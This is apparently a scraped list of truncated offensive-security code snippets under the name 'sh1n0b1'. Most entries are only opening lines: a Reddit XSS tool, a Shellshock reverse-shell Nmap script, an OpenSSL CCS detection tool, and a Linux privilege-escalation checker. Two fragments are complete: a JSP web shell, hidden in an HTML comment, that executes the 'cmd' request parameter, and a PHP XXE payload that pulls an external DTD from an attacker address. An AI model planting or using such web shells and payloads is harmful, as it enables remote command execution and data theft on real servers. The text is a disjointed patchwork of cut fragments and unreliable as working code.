sh1n0b1

#!/usr/bin/env python
#Reddit XSS
#Author: Cheetz
import urllib2, sys
import logging, os, re, sys, urllib, string
from optparse import OptionParser
from urlparse import urlparse

class Lookup:
        def run(self,url):

sh1n0b1

$sesshash{'ip'} = '68.227.245.145';
$sesshash{'user'} = 'admin';

sh1n0b1

#!/usr/bin/perl -w

use CGI;
use Digest::MD5 qw(md5_hex);

$cgi = new CGI;
$SESSDIR = "/tmp/";
$sessfile = $cgi->cookie("diagsess");
$arg0 = $cgi->param("arg");
$action = $cgi->param("action");

sh1n0b1

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local vulns = require "vulns"

description = [[
NSE script that delivers you a reverse shell using CVE-2014-6271.
Usage: ./nmap -p80 --script http-vuln-cve-2014-6271.nse 
--script-args http-vuln-cve-2014-6271.remoteIp=<your-ip>,http-vuln-cve-2014-6271.remotePort=<your-port>,http-vuln-cve-2014-6271.uri=/cgi-bin/status 
<ip> -d

sh1n0b1

#!/bin/python

import sys
import socket
import time
import struct

if len(sys.argv)<2:
    print "Tripwire VERT CVE-2014-0224 Detection Tool (OpenSSL Change Cipher Spec Injection) v0.3 by Tripwire VERT (@TripwireVERT)\nUsage: %s <host> [port=443]" % (sys.argv[0])
    quit()

sh1n0b1

<html>
<title>PHP Source Analyzer by Delicon</title>
<head>
<script language="JavaScript">
function mouseDown_Action(c_id) {
   var obj = document.getElementById(c_id);
   if (obj.style.visibility == 'hidden') {
      obj.style.visibility = 'visible';
      obj.style.position = 'static';
   } else {

sh1n0b1

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <gnu/libc-version.h>
#define CANARY "in_the_coal_mine"
struct {
char buffer[1024];
char canary[sizeof(CANARY)];

sh1n0b1

<?php

$xml_data ='<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE roottage [
<!ENTITY % dtd SYSTEM "http://<IP_ADDRESS>">
%dtd;]>';
//<!ENTITY xxe SYSTEM "http://target/">]>
$URL = "https://target/";
$ch = curl_init($URL);
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: text/html'));

sh1n0b1

<html>
<head>
<!-- <% if (request.getParameter("cmd") != null) { out.println("Command: " + request.getParameter("cmd") + "<br />"); Process p = Runtime.getRuntime().exec(request.getParameter("cmd")); OutputStream os = p.getOutputStream(); InputStream in = p.getInputStream(); DataInputStream dis = new DataInputStream(in); String disr = dis.readLine(); while ( disr != null )
{ out.println(disr); disr = dis.readLine(); } } %> 
-->
</head>
<body>
</body>
</html>

sh1n0b1

#!/usr/env python

###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]: 
## This script is intended to be executed locally on a Linux box to enumerate basic system info and 
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.